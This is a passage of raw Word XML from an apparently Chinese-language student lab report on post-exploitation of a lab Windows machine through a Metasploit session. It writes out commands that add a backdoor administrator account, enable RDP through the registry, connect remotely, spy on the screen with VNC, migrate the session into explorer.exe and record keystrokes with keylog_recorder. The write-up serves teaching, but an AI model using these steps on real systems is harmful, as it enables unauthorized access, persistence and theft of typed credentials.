          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入：chcp 65001 解决乱码问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333C06C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749290" cy="2471420"/>
            <wp:effectExtent l="0" t="0" r="381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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5749290" cy="2471420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA293C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BE6F4">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增加用户：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A89AD">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接下来通过shell控制该系统：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FEC6B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首先输入“net user wmy 123456  /add”添加用户；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3694767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然后输入“net user”查看用户信息，可以看到用户添加成功了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E9E36">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757545" cy="1600835"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1206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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5757545" cy="1600835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279435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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图十一）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B4D60">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后输入“net localgroup administrators wmy /add”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将用户sss添加至管理员组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31476B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>再输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>netstat -ano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看3389端口状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>看到3389端口并没有开启，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入“REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f””</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开启3389端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B1D997">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5755005" cy="4215130"/>
            <wp:effectExtent l="0" t="0" r="10795" b="127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5755005" cy="4215130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E0E5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（图十二）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FF8E5B">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输入“rdesktop 192.168.184.134:3389”以远程桌面连接靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A7EADC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5755005" cy="4820920"/>
            <wp:effectExtent l="0" t="0" r="10795" b="508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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755005" cy="4820920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DEA3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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图十三）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E101B95">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLine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再选择其他用户，用刚刚在该电脑上注册的wmy/123456，就可以登陆成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3169F7F1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="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屏幕监控：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3FD49">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>msfconsole攻击后输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>run vnc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,即可靶机屏幕进行监控。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03096C08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B874528">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5757545" cy="3612515"/>
            <wp:effectExtent l="0" t="0" r="8255" b="698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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5757545" cy="3612515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F7C7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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（图十四）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804584B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="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键盘监控：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C2353">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps命令查看运行在目标系统的进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F16F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5751830" cy="3721735"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12065"/>
            <wp:docPr id="1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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5751830" cy="3721735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="256467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（图十五）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B7B911">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>输入migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>780</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令将meterpreter会话迁移至explorer.exe（1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>780</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）进程中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41B204">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里挂了比较久，又重新试了一次，explorer.exe的接口变成了2028</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0577F37F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5749925" cy="608965"/>
            <wp:effectExtent l="0" t="0" r="3175"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24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5749925" cy="608965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD7E95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（图十六）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F3D6AB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">输入run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>post/windows/capture/keylog_recorder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后开始对靶机键盘进行监控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4401BD01">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5758815" cy="854075"/>
            <wp:effectExtent l="0" t="0" r="6985"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25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5758815" cy="854075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA27F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（图十七）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581C477">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在此期间我在靶机上输入了“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>wang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”，按ctrl+c结束监控，查看所存文档可以发现成功地监控了键盘。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0981219A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5755005" cy="1108710"/>
            <wp:effectExtent l="0" t="0" r="10795" b="889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26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755005" cy="1108710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5994803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（图十八）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE86B1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="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重启：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3D059">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黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用shell进入靶机的cmd后，输入“shutdown -r -t 0”即可控制靶机关机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E76E7F0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
